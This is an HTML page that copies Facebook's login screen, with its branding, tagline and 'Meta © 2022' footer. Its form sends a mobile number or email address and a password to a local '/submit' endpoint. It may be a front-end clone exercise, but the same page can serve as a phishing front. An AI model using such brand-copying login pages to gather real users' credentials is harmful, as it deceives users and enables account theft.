<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1" >
    <title>Facebook Login</title>
    <link rel="stylesheet" href="./index.css">
</head>
<body>
    <div id="left_ct">    
        <div id="facebook">facebook</div> 
        <div class="con">Connect with the people and the world<br> around you on Facebook.</div>
    </div>
    <div class="rt_ct">
        <form id="form" action="/submit" method ="POST">
            <input name="mobile" type="text" autofocus id="mobile" placeholder="    Mobile number or email address"><br><br>
            <input name="password" type="password" id="password" placeholder="    Password">
            <button type="submit" id="submit">Login</button>
        </form>
        
        <div id="incontainer">
            <a id="forgotten" href="#">Forgot password?</a>
            <div id="or_container">              
                <h3 id="or">or</h3>
            </div>
            <div id="line"></div>
            <div id="create">Create New User</div>
            <div id="about">About Help More</div>
            <div id="meta">Meta<span id="copy">&COPY</span> 2022</div>
        
        </div>
    </div> 
    <script>
     
    </script>   
    </body>
</html>